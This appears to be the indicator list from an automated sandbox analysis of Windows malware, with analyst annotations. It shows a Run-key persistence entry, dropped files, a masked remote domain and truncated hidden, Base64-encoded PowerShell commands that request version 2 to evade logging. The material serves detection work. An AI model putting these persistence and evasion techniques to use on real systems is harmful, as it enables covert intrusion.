Technical Information
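- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Check License' = '%TEMP%\write.exe'
  (Per-user autorun entry: the value named 'Check License' starts %TEMP%\write.exe each time this user logs on.)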
- '%TEMP%\write.exe'
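- '%ProgramFiles%\microsoft office\office14\clview.exe' "EXCEL" "Microsoft Excel"
  (clview.exe is launched from the Office 14 installation directory; the msofficehelp14, content.ie5 and 'microsoft help' paths listed below appear to be cache files written by this help viewer, so on their own they are weak indicators compared with %TEMP%\write.exe and %ALLUSERSPROFILE%\tryxaebx.)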
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mvalidator.lck
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\toc[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\ont.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\ont[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\script.js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\script[1].js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\contenthxs.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\contenthxs[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvtitlebg.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\clvtitlebg[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvbluebg.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\clvbluebg[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvgraybg.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\clvgraybg[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\toc.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\offlineclientviewer.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\offlineclientviewer.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\offlineclientviewer[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvimagepanemedia.jpg
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\clvimagepanemedia[1].jpg
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\cvglobal.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\cvglobal[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\cvglobalstrings.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\cvglobalstrings[1].xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\bullet.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\bullet[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clv14titlebarbg.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\clv14titlebarbg[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-lsd.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\offlineclientviewer[1].xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\tbgradient[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\tbgradient.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\search[1].xsl
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012022070820220709\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\browse0.excel.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\back.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\back[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\back2.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\back2[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\bulletl.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\bulletl[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\errexcl.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\errexcl[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\help.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\help[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\helpid.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\helpid[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\logo.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\logo[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\message.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\message[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\next.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\next[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\next2.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\next2[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\online.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\online[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\content.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\content[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\office12.js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\office12[1].js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\search.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\page-lsd[1].png
- %TEMP%\write.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-lsh.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-rsd.png
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_k.hxw
- %TEMP%\imt9ee7.tmp
- %TEMP%\imt9ec7.tmp
- %TEMP%\imt9ec6.tmp
- %TEMP%\imt9ea5.tmp
- %TEMP%\imt9e85.tmp
- %TEMP%\imt9e65.tmp
- %TEMP%\imt9e64.tmp
- %TEMP%\imt9e34.tmp
- %TEMP%\imt9e33.tmp
- %TEMP%\imt9e32.tmp
- %TEMP%\imt9e21.tmp
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_f.hxw
- %TEMP%\imt9f07.tmp
- %TEMP%\imt9e11.tmp
- %TEMP%\imt9de0.tmp
- %TEMP%\imt9dc0.tmp
- %TEMP%\imt9daf.tmp
- %TEMP%\imt9dae.tmp
- %TEMP%\imt9d9e.tmp
- %TEMP%\imt9d9d.tmp
- %TEMP%\imt9d8c.tmp
- %TEMP%\imt9d6c.tmp
- %TEMP%\imt9d5b.tmp
- %TEMP%\imt9d5a.tmp
- %TEMP%\imt9d4a.tmp
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mtoc_excel_col.hxh
- %TEMP%\imt9d39.tmp
- %TEMP%\imt9df1.tmp
- %TEMP%\imt9f08.tmp
- %TEMP%\imt9f19.tmp
- %TEMP%\imt9f1a.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\page-rsd[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-rsh.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\page-rsh[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\ontrtl.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\ontrtl[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\localhelp.txt
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\localhelp[1].txt
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clientviewersettings.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\clientviewersettings[1].xml
- %TEMP%\imta093.tmp
- %TEMP%\imta083.tmp
- %TEMP%\imta053.tmp
- %TEMP%\imta052.tmp
- %TEMP%\imta051.tmp
- %TEMP%\imta040.tmp
- %TEMP%\imta03f.tmp
- %TEMP%\imta03e.tmp
- %TEMP%\imt9fe0.tmp
- %TEMP%\imt9fdf.tmp
- %TEMP%\imt9fce.tmp
- %TEMP%\imt9fbe.tmp
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mvalidator.hxd
- %TEMP%\imt9fad.tmp
- %TEMP%\imt9f8d.tmp
- %TEMP%\imt9f7c.tmp
- %TEMP%\imt9f5c.tmp
- %TEMP%\imt9f5b.tmp
- %TEMP%\imt9f4a.tmp
- %TEMP%\imt9f3a.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\page-lsh[1].png
- %ALLUSERSPROFILE%\tryxaebx
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mtoc_excel_col.hxh
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_f.hxw
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_k.hxw
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mvalidator.hxd
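- 'sk####ortemp.site':443
- 'sk####ortemp.site':443
- DNS ASK sk####ortemp.site
  (The domain is partially masked with '####' in this report, so it cannot be used as an exact-match indicator as printed; the two port 443 entries and the DNS query all show the same masked name.)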
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -version 2 -w hidden -nopro -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIA...' (with hidden window)
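- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -version 2 -w hidden -nopro -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIA...
  (The visible part of the -enc argument is Base64 of UTF-16LE text and decodes to `$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEb`, cut off where the report truncates it. The script therefore begins by reading a file under C:\ProgramData whose name starts like the %ALLUSERSPROFILE%\tryxaebx entry listed above. `-version 2` requests the PowerShell 2.0 engine, which predates script block logging and AMSI, so detection should rely on the process command line and on the engine version recorded in the Windows PowerShell event log.)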